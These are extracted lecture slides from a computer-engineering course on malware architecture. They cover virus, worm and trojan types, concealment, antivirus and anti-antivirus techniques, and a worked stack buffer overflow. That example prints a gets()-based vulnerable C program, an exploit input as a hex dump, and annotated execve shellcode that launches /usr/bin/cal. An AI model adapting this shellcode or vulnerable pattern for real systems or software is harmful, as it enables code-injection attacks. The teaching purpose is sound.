Malware Overview - Computer Engineering
Download
Report
Transcript Malware Overview - Computer Engineering
Malware
Architecture
COEN 250
Malware Types
Self-replicating malware
Creates
new instances of itself
In contrast to passive replication
Population growth
Changes
in number of instances
Parasitic malware
Requires
some other executable code to exist
Malware Types
Logic Bomb
not
self-replicating, zero population growth, possibly
parasitic
Consists of
Payload
An action to be performed
Trigger
Boolean condition to be executed
Example:
If Thomas Schwarz is not getting paid then delete the COEN
website.
Malware Types
Trojan Horse
parasitic
Program
that purports doing something benign
But secretely performs a malicious task
Example:
Authentic looking login page with username and password
prompt
Stores result in a file, exits user, so that true login page
appears
Malware Types
Backdoor
Mechanism that bypasses normal security checks
Virus
Self-replicating
Positive Population Growth
Parasitic
Runs when a certain executable runs
Infects other executables
Traveling on same system, floppy, CD, DVD, USB
First mentioned in SF novel “The Scarred Man” Gregory
Benford, 1970
Malware Types
Worm
self-replicating
positive
population growth
not parasitic
Spread from machine to machine across a
network
Malware Types
Rabbits
Tries
to consume all system resources by
multiplying quickly
Fork bomb
A worm
that deletes itself after infecting
another machine
Worm hops from machine to machine
Malware Types
Spyware
Software
that collects information from a
system and transmits it to someone else.
Addware
Spyware
that presents adds.
Virus
Viruses consist of
Infection
Mechanism
Can be multipartite
Trigger
(optional)
Payload (optional)
Virus
Target Classification
Boot-Sector
Infectors
File Infectors
Macro Viruses
Concealment Strategy Classification
No
Concealment
Encryption
Stealth
Oligomorphism, Polymorphism, Metamorphism
Virus: Boot Sector Infectors
Contains code that runs when a system
starts up.
Volume Boot Record
First
sector of an unpartitioned storage device
First sector of an individual partition
Master Boot Record
First
sector of data storage device that has
been partitioned
Virus: Boot Sector Infectors
Booting:
Bootstrap loader
Loads software to start OS
Multi-stage bootstrap loader
Boot sequence on IBM-PC
Runs instruction at memory location F000:FFF0 of BIOS
Jumps to execution of BIOS startup program
Executes Power-On Self-Test (POST)
Checks, initializes devices
Goes through preconfigured list of devices
If it finds bootable device, loads, and executes boot sector
Assume MBR on hard drive
MBR contains address of bootable partition
Load boot sector of bootable partition
Boot sector moves OS kernel into memory and starts it
Virus: Boot Sector Infectors
Boot Sector Infector
Copies itself into the MBR or VBR
Typically after making copy of MBR
location”
Michelangelo:
April 1991
Moves original boot sector to safe location
Infects all floppy disks inserted into computer
Payload:
in a “safe
overwrites file system with zeroes
Extinct in the wild
Virus: Boot Sector Infectors
Boot Sector Infector
Stoned Virus
Original version infects only 360KB diskettes
1988
Many variants
Behavior
Becomes memory resident
Disables interrupt 12
Infects MBR
Infects all diskettes
Moves boot sector to sector 11 and copies itself into sector 0
Same values as chosen by Michelangelo, so that computers infected with
both became immediately dysfunctional
Usually destroys part of the file system
Payload: Displays message during boot process:
“Your PC is now Stoned!
Your computer is now stoned.
Virus: Boot Sector Infectors
Extinct in the wild:
Floppies
are rarely used to boot, disabling the
propagation mechanism
OS prevent writing to a disk’s boot sector
without proper authorization
BIOS can enable boot block protection
Virus: File Infectors
Virus infects executables
Virus
is placed in an executable
Prepending Virus: At the beginning
Execution of a *.com loads file into memory
Set PC to beginning of file
Often copies infected file further down
Virus: File Infectors
Appending Virus: At the end
To
get control
Save original instruction in code, replace by jump to viral
code, execute virus, restore original instruction and jump to
them or run original instruction at saved location followed by
jump to the rest of the code
Executable file formats can specify start location in file
header
Virus: File Infectors
Overwriting Viruses
Atop
original code
Does not change file size
Virus gets control in normal execution of file
Placement Strategies:
Place virus in superfluous data
Place virus in file slack or unused allocated file space
Stash overwritten contents in a companion file
Compress (parts of) the original file, decompress
Virus: File Infectors
Inserting Virus
Move
target code out of way
Intersperse small pieces of virus with infected
file
Companion Virus
Virus
gets executed before infected file
Infected file barely changed
Virus: File Infectors
Companion Virus Example
Change name of target file
Virus placed earlier in search path
notepad.exe in a different directory than real notepad.exe
notepad.com is executed before notepad.exe
Use Windows registry to change association for .exe files
Change “interpreter in ELF files
Copy notepad.exe to notepad.exp
Virus is in new notepad.exe, which calls notepad.exp
Typically the run-time linker, but now virus
Associate icon of target with virus
Virus: Macro Virus
Macros
Code
that is part of documents.
Used extensively in MS Office Tools
Written in or translated to Visual Basic for
Applications (VBA) code
Macro Virus
Changes
or creates new macro
Virus: Macro Virus
Example:
Concept
1995-1997
Infects Word’s global document-template
NORMAL.DOT
Creates PayLoad and FileSaveAs macros
Infects all documents saved with the Save As
command
Virus: Macro Virus
Example: Laroux
–
Excel macro virus
Consists of auto_open and check_files
1996
auto_open executes whenever an infected
spreadsheet is opened, followed by check_files
Virus looks for PERSONAL.XLS
Virus
contains no malicious payload
Virus: Macro Virus
Protective Strategies
Later
versions of MS Office have security
levels for execution of macros
Level high only executes signed macros
MS
Office provides warnings when files
contain macros
ScanProt (Word prior to 7.0a) scans for the
Concept virus
Virus: Concealment
Encryption
Virus
body is encrypted to make it harder to
detect
Virus needs to contain a decryption engine
Encryption methods range from very simple to
strong
Virus: Concealment
Stealth
Virus takes active steps to conceal infection
Restore original file timestamp
Intercept system calls to play back original information of file
Change I/O calls in DOS
Change system libraries in more sophisticated OS
Run rootkit
Anti-stealth virus
Virus
makes all files look infected
Payload: Anti-virus software deletes all other files
Virus: Concealment
Oligomorphism
Encrypted virus changes encryption key between infections
Infected files have different file signatures
Polymorphism
Virus also changes decryption engine
By using equivalent instruction sequences
By using different versions
Tremor had 6 decryption engines
Makes it difficult for virus to detect its presence
Virus can use specific timestamp (e.g. add 100 to file year)
Pad file sizes of infected files to a certain value
Use hidden flags in ELF format
Use metadata or alternative data streams (in NTFS)
Store data in registry or other location
Virus: Concealment
Hiding Decryptor Engine
Using a mutation engine
Instruction equivalence
All these set register r0 to zero:
clear r0
xor r0,r0
and 0, r0
move 0, r0
Instruction sequence equivalence
Instruction reordering
Register renaming
Data reordering
Spaghetti code
Junk code insertion
Run-time code generation
Use a virtual machine
Use concurrent threads to make analysis difficult
Inlining, outlining, call sequence changes
Virus: Concealment
Metamorphism
Use
code modification to change body of virus
Virus: Antivirus Techniques
Detection
Identification
Disinfection
Virus: Antivirus Techniques
Static Detection Mechanism
On-demand / On –access scanning
Virus signatures a.k.a scan strings:
Identifying
substrings in infected code
Problem: How to search for many patterns at
once
Static Heuristics
Positive
Heuristics
Negative Heuristics
Virus: Antivirus Techniques
Static Detection Mechanism
Positive Heuristics (Boosters)
Junk code
Decryption loops
Self-modifying code
Use of undocumented API
Manipulation of interrupt vectors
Unusual instructions, especially those not emitted by a compiler
Strings containing obscenities or “virus”
Difference between entry point and end of file
Spectral analysis
Frequency analysis of instructions
Virus: Antivirus Techniques
Static Detection Mechanism
Negative heuristics = stoppers
user
input
GUI popups
Analysis
Weighted
measure
trained by good and bad sets
Neural
networks
Data mining
Virus: Antivirus Techniques
Static Detection Mechanism
Integrity Checks
Tripwire:
Calculate cryptographically secure hash of all system files
Store it in unchangable directory
E.g. CD-ROM
Scan periodically to check integrity of all system files
Updates:
Check integrity of system
Patch system
Calculate new checksums
Self-checking
of antivirus software
Virus: Antivirus Techniques
Dynamic Methods
Behavior blockers:
Software
monitors running program in real time
Watches for suspicious activity such as file system
accesses
Appending virus opens executable for reading and writing
Generates activity signature of bad pattern:
Use
open, read, write, seek to end, appending, close
notion of ownership to prevent too many false
positives
Virus: Antivirus Techniques
Dynamic Methods
Emulation
Emulation uses dynamic heuristics
Analyze code before letting it run
Same as static heuristics
Same as behavior blockers
Emulation uses generic decryption
Use virus’ own decryption loop to scan for decrypted virus
Decryption loop should have run when:
Program accesses code that it just modified
24B + of modified memory
Emulator can run signature searches some time into runtime of emulated code
Virus: Antivirus Techniques
Dynamic Methods
Emulator Architecture
1.
2.
3.
4.
Single stepping through a program can be detected by virus through
timing
Instead:
CPU emulation
Memory emulation
Hardware and OS emulation
Emulation control
Major Issue: When to stop
5.
Number of instructions
Amount of time spent emulating
Proportion of instructions that modify memory
Presence of stoppers
Post Analysis Data
Instruction histogram
Dead code
Virus: Antivirus Techniques
Dynamic Methods
Reentering emulation:
Virus
code can be CPU specific. Emulation
might need to run with different CPU
parameters.
Installation of interrupt handlers should trigger
emulation of the interrupt handlers
Using goats to verify infective behavior
Emulator
provides a goat file to suspect file to
see changes.
Virus: Antivirus Techniques
Verification and Identification
Verification
reduces false positives
necessary for disinfection
Difficult only with polymorphic viruses
Try to decrypt virus body – X-raying
Side effect of emulating decryptor engine
Breaking weak encryption
Identify using
signatures
known copy of virus
check-summing of virus
Virus: Antivirus Techniques
Quarantine
Quarantine isolates infected file from rest
of the system
Often,
copying of file to a quarantine directory
Trivially encrypt file to make it unrunnable
Render files in quarantine directory invisible
Virus: Antivirus Techniques
Disinfection
Restore files from backup
Virus-specific actions
Virus: Antivirus Techniques
Anti-Macro Virus
Macro can change through reformatting
MS
Word document converter has produced
new versions of a macro virus
Bugs in macro virus propagation mechanism
can introduce new variants
Macro virus can incorporate other macros
Happened to a Word macro snatching two antivirus macros from MS
Anti-Anti-Virus Techniques
Aggressively attack anti-virus software
Impede anti-virus analysis by anti-virus
labs
Use knowledge of anti-virus mechanisms
to avoid dectection
Not anti-virus virus
“Beneficial”
virus
Anti-Anti-Virus Techniques
Retrovirus
Disables anti-virus software
Virus
has list of process names of anti-virus products
Kills any processes with these names
Disables antivirus program
Ganda inspects programs that run at start-up (autorun)
Replaces first instruction of identified anti-virus programs with
a return
Reduce
priority of anti-virus software so that it never
runs
Disable look-up of antivirus software updates
Anti-Anti-Virus Techniques
Entry point obfuscation (EPO)
Alternative
ways of getting virus code to run
Simile, Ganda look for calls to ExitProcess API
Anti-Anti-Virus Techniques
Anti-Emulation
Outlast emulation
Virus
can do nothing bad for a long time
Virus only replicates randomly
Entry-point obfuscation also delays virus
execution
Outsmarting emulation
Restructure
viral code
No longer looks like a virus
Anti-Anti-Virus Techniques
Anti-Emulation
Emulator detection
Use undocumented CPU instructions
Exploit differences in CPU
Attack emulator memory system
E.g. emulator returns always the same time stamp
Import obscure libraries
Looking for external things
use many memory addresses
go to unusual memory locations
Test for changes between API calls
In the hope that emulator crashes on them
Hard to emulate
Check for specific emulators
Anti-Anti-Virus Techniques
Armoring, Anti-Debugging
Armoring
Use anti-reverse engineering techniques to make analysis of
virus behavior difficult
Detecting Debug Mode
Use debugger specific idiosyncrasies
Detect breakpoint insertion
Breakpoints are implemented through system interrupts
Check for single-stepping
Interrupt dumps info on stack
Push on stack, then pop, see whether item is still there
Check for system time
Manipulate prefetch queue in CPU
Use IsDebuggerPresent API
Anti-Anti-Virus Techniques
Tunneling
Tunneling virus backtracks interrupt chain
to go directly to DOS and BIOS interrupt
handlers
Avoids monitoring
Only possible in MS-DOS
Kernel
software protected in other OS
Anti-Anti-Virus Techniques
Anti-Integrity Checking
Polymorphic virus can hide file changes
against simple checksums
Slow virus only changes files that are
about to be changed anyway
Anti-Anti-Virus Techniques
Avoidance
Virus infects areas that are not checked by
anti-virus software
Worms
Worms:
Propagates across a network
Typically, does not require user action for
propagation.
Virus:
Infects files.
Typically requires user interaction
Worms
Worm Components
Warhead
Propagation Engine
Target Selection Algorithm
Scanning Engine
Payload
Worms: Warhead
A piece of code that exploits a vulnerability
on the target system
Exploits
such as Buffer Overflow Exploits
File Sharing Attacks
E-mail
Common Mis-configurations
Worms:
Propagation Engine
After gaining access, the worm must transfer itself to the
target machine.
Some worms are completely contained in the warhead.
File Transfer Mechanisms
FTP
TFTP
HTTP
SMB (MS Server Message Block)
Windows file sharing
Unix servers running SAMBA
Worms:
Target Selection Algorithm
Once the worm has gained control of a
target, it starts looking for new targets.
E-mail
addresses
Host lists
Trusted Systems
Network Neighborhood
DNS queries
Randomly selected ip address.
Worms: Scanning Engine
Once targets are identified, the worm
scans for the original vulnerability.
Worms: Payload
Some specific action done on behalf of the
attacker.
Opening up a backdoor.
Planting a distributed denial of service attack.
Performing complex calculations:
password
cracking
math research (actually happened)
Worms: Spreading
Worm spread is limited
Diversity
“Tiny Worm”
of machines
targeted only machines running security software from a
medium company
was successful in infecting most machines with that software.
Worms can contain support for multiple entry methods.
Too
many victims crash
Fast worms can cause network congestion
Worm Trends:
Multiplatform worms
Multiexploit worms
Zero-day exploit worms
Fast-spreading worms: Warhol / Flash
pre-scan targets
Polymorphic worms
No chance to patch
Change appearance
Metamorphic worms
Change functionality
Strings
Attacks
A buffer overflow occurs when data is written
outside of the boundaries of the memory
allocated to a particular data structure.
11 Bytes of Data
Source
Memory
Copy
Operation
Allocated Memory (8 Bytes)
Other Memory
Strings
Attacks
Buffer overflow occur because we usually
do not check bounds.
Standard
library functions do not check
bounds.
Programmers do not check bounds.
Not all buffer overflows are exploitable.
Strings
Attacks
Process Memory Organization
Code or Text: Instructions
and read only data
Data: Initialized data,
uninitialized data, static
variables, global variables
Heap: Dynamically
allocated variables
Stack: Local variables,
return addresses, etc.
Attacks
Stack Management
When calling a subroutine / function:
Stack
stores the return address
Stack stores arguments, return values
Stack stores variables local to the subroutine
Information pushed on the stack for a subroutine
call is called a frame.
Address
of frame is stored in the frame or base point
register.
epb on Intel architectures
Attacks
Stack Management
#include <iostream>
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password, “badprog"))
return(true);
else return(false);
}
void main()
{
bool PwStatus;
puts("Enter password:");
PwStatus = IsPasswordOkay();
if (PwStatus == false){
puts("Access denied");
exit(-1);
}
else puts("Access granted");
}
Attacks
Stack Management
Program stack before call to IsPasswordOkay()
Stack
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStatus==true)
puts("Hello, Master");
else puts("Access denied");
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Attacks
Stack Management
Program stack during call to IsPasswordOkay()
Stack
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStatus ==true)
puts("Hello, Master");
else puts("Access denied");
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password,"badprog"))
return(true);
else return(false)
}
Storage for Password (8 Bytes)
Caller EBP – Frame Ptr main (4
bytes)
Return Addr Caller – main (4
Bytes)
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Attacks
Stack Management
Program stack after call to IsPasswordOkay()
Stack
Storage for Password (8 Bytes)
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStatus ==true)
puts("Hello, Master");
else puts("Access denied");
Caller EBP – Frame Ptr main (4
bytes)
Return Addr Caller – main (4
Bytes)
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Attacks
Buffer Overflow Attack
#include <iostream>
bool IsPasswordOkay(void)
{
char Password[8];
What happens if we enter more than 7
characters of an input string?
gets(Password);
if (!strcmp(Password, “badprog"))
return(true);
else return(false);
}
void main()
{
bool PwStatus;
puts("Enter password:");
PwStatus = IsPasswordOkay();
if (PwStatus == false){
puts("Access denied");
exit(-1);
}
else puts("Access granted");
}
Attacks
Buffer Overflow Attack
Stack
Storage for Password (8 Bytes)
“12345678”
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password,"badprog"))
return(true);
else return(false)
}
The return address and other data on the
stack is over written because the memory
space allocated for the password can only
hold a maximum 7 character plus the NULL
terminator.
Caller EBP – Frame Ptr main (4
bytes)
“9012”
Return Addr Caller – main (4
Bytes)
“3456”
Storage for PwStatus (4 bytes)
“7890”
Caller EBP – Frame Ptr OS (4
bytes)
“\0”
Return Addr of main – OS (4
Bytes)
…
Attacks
Buffer Overflow Attack
A specially crafted string
“abcdefghijklW►*!” produced the
following result:
Attacks
Buffer Overflow Attack
The
string “abcdefghijklW►*!”
overwrote 9 extra bytes of
memory on the stack changing the
callers return address thus
skipping the execution of line 3
Line
Statement
1
puts("Enter
Password:");
2
PwStatus=ISPasswordOkay
();
3
if (PwStatus ==true)
4
puts("Hello, Master");
5
else puts("Access
denied");
Stack
Storage for Password (8 Bytes)
“abcdefgh”
Caller EBP – Frame Ptr main (4 bytes)
“ijkl”
Return Addr Caller – main (4 Bytes)
“W►*!” (return to line 4 was line 3)
Storage for PwStatus (4 bytes)
“/0”
Caller EBP – Frame Ptr OS (4 bytes)
Return Addr of main – OS (4 Bytes)
Attacks
Buffer Overflow Exploit
A buffer overflow can be exploited by
Changing
the return address in order to
change the program flow (arc-injection)
Change the return address to point into the
buffer where it contains some malicious code
(Code injection)
Attacks
Buffer Overflow Attack
000
010
020
030
040
The get password program can be exploited to
execute arbitrary code by providing the following
binary data file as input:
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38-39
34-35
B0-0B
FF-BF
2F-62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
This exploit is specific to Red Hat Linux 9.0 and GCC
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The first 16 bytes of binary data fill the allocated
storage space for the password.
NOTE: Even though the program only allocated 12
bytes for the password, the version of the gcc compiler
used allocates stack data in multiples of 16 bytes
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The next 12 bytes of binary data fill the extra
storage space that was created by the compiler to
keep the stack aligned on a16-byte boundary.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The next 12 bytes of binary data fill the extra
storage space that was created by the compiler to
keep the stack aligned on a16-byte boundary.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The next 4 bytes overwrite the return address.
The new return address is 0X BF FF F9 E0 (littleendian)
Attacks
Buffer Overflow Attack
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code.
Purpose
of malicious code is to call execve with a user
provided set of parameters.
In this program, instead of spawning a shell, we just call
the linux calculator program.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:
xor %eax,%eax #set eax to zero
mov %eax,0xbffff9ff #set to NULL word
Create
a zero value and use it to NULL terminate
the argument list.
This is necessary to terminate the argument list.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:
xor %eax,%eax #set eax to zero
mov %eax,0xbffff9ff #set to NULL word
mov $0xb,%al #set code for execve
Set
the value of register al to 0xb. This value
indicates a system call to execve.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:
mov $0xb,%al #set code for execve
mov $0xbffffa03,%ebx #ptr to arg 1
mov $0xbffff9fb,%ecx #ptr to arg 2
mov 0xbffff9ff,%edx #ptr to arg 3
This puts the pointers to the arguments into ebc, ecx, and
edx registers.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:
mov $0xbffffa03,%ebx #ptr to arg 1
mov $0xbffff9fb,%ecx #ptr to arg 2
mov 0xbffff9ff,%edx
#ptr to arg 3
int $80 # make system call to execve
Now make the system call to execve. The arguments are
in the registers.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
The
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
malicious code:
Last part are the arguments.
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
Attacks
Buffer Overflow Attack
./BufferOverflow < exploit.bin now
executes /usr/bin/cal\0.
Attacks
Primary C / C++ Vulnerabilities
Buffer Overflow
Stack
Heap
integer overflow
Formatted Output Vulnerability
Much harder to prevent
Pointer mistakes
Dynamic Memory Management
Program Flow Mistakes
Can be prevented: Stackguard, Canaries, No-Execute Permission
Only in C, culprit is a printf kludge
Concurrency Issues
Intervening event between check and access
Attacks
Mobile Code Attacks